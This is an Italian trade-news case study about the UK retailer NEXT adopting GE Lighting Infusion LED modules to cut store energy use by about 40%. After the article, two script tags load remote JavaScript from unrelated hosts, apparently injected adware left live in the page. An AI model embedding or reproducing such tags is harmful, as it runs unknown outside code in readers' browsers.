1. Home
  2. Notizie e Mercato
  3. “NEXT” generation LED per il principale retailer inglese

“NEXT” generation LED per il principale retailer inglese

Energie rinnovabili di
5/5
votato da 1 persone
Look ed ecosotenibilità vanno di pari passo con l’evoluzione tecnologica. NEXT, la catena di negozi di moda e arredamento più nota del Regno Unito, ha scelto i moduli Infusion™ LED di GE Lighting


Per rispettare il proprio impegno a ridurre il consumo di energia e le emissioni di anidride carbonicaNEXT è passato da un’illuminazione tradizionale alla più recente tecnologia a LED. Il gruppo ha scelto i moduli Infusion™ LED di GE Lighting  come parte della soluzione per arrivare a raggiungere il 40% di risparmio energetico, ridurre i costi di manutenzione e al tempo stesso migliorare la qualità dell’illuminazione dei propri negozi.

Chi è Next
Next è la catena di negozi di moda e arredamento più nota del Regno Unito, con oltre 530 punti vendita in tutto il Paese. La sostenibilità ambientale è una priorità per l'azienda e uno dei suoi obiettivi principali è quello di migliorare l'efficienza e ridurre il consumo energetico, con l'obiettivo di raggiungere il 35% di risparmio energetico entro il 2015.

La sfida
Il team di NEXT aveva valutato l'opportunità di migliorare gli impianti di illuminazione negli store con l’obiettivo di risparmiare sul consumo energetico, sostituendo le vecchie soluzioni per lampade Alogene MR16, a Scarica con bruciatore ceramico CMH e Fluorescenti Compatte con soluzioni a tecnologia LED. L’azienda stava cercando una soluzione affidabile che fornisse una luce di altissima qualità con  alta resa dei colori (CRI) e un ottimo mantenimento del flusso luminoso (lumen), oltre ad essere a prova di futuro in modo da poter essere intercambiabili man mano che la tecnologia LED evolve.

La soluzione
Il team di esperti di Next ha individuato il modulo InfusionTM LED di GE Lighting in quanto adatto a rispondere alle necessità di avere una soluzione duratura, controllabile, con manutenzione minima e ideale per aree applicative dove la qualità della luce è fondamentale per la scelta d’acquisto e l’esprienza dello shopping.

Questa soluzione consente la libertà di creare aree su cui attrarre l’attenzione del consumatore, grazie all’estrema flessibilità di modificare fasci e intensità luminose sostituendo solo le ottiche e i moduli. Inoltre questi prodotti sono predisposti per  essere facilmente aggiornati seguendo l’evoluzione tecnologica, senza bisogno di cambiare gli apparecchi. Tutto ciò, combinato con l’eccellente stabilità delle performance, in conformità agli standard LM-79 e LM-80, hanno convinto NEXT della perfetta aderenza dei prodotti ai loro criteri di selezione.  

Il team di Next, diffidente nei confronti delle dichiarazioni infondate ricevute in precedenza sui LED, è stato inoltre ulteriormente rassicurato dai numerosi test messi a loro disposizione, effettuati su InfusionTM LED, che supportavano le promesse di lunga durata e mantenimento delle performance promesse.

Risultati e Benefici
Prendere una decisione informata su un sistema LED oggi è veramente difficile, vista l’offerta così varia di prodotti venduti sul mercato con varie dichiarazioni di performance“, ha spiegato NEXT, “Per questo, siamo stati molto meticolosi nel nostro processo di selezione e abbiamo stabilito dei parametri di valutazione molto vari per la scelta del prodotto finale. Siamo molto soddisfatti del sistema di illuminazione che abbiamo selezionato. Il negozio non ha solo un look eccellente, ma per i prossimi cinque o dieci anni non avrà bisogno di manutenzione”.
La ristrutturazione effettuata porterà Next a raggiungere un risparmio energetico pari al 40%.

La tecnologia LED rappresenta oggi un’alternativa moderna, dalle alte performance e risparmio energetico rispetto alle tradizionali lampade Alogene, Fluorescenti Compatte e a Scarica con bruciatore ceramico CMH, garantendo una illuminazione di qualità superiore e una migliore resa dei colori. Per questo le soluzioni LED sono l’ideale per una grande varietà di applicazioni retail.  
Quando si parla di Tecnologia LED è d’obbligo valutare qualità, affidabilità e garanzia del prodotto, fattori che GE lighting offre da anni ai propri clienti.




<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>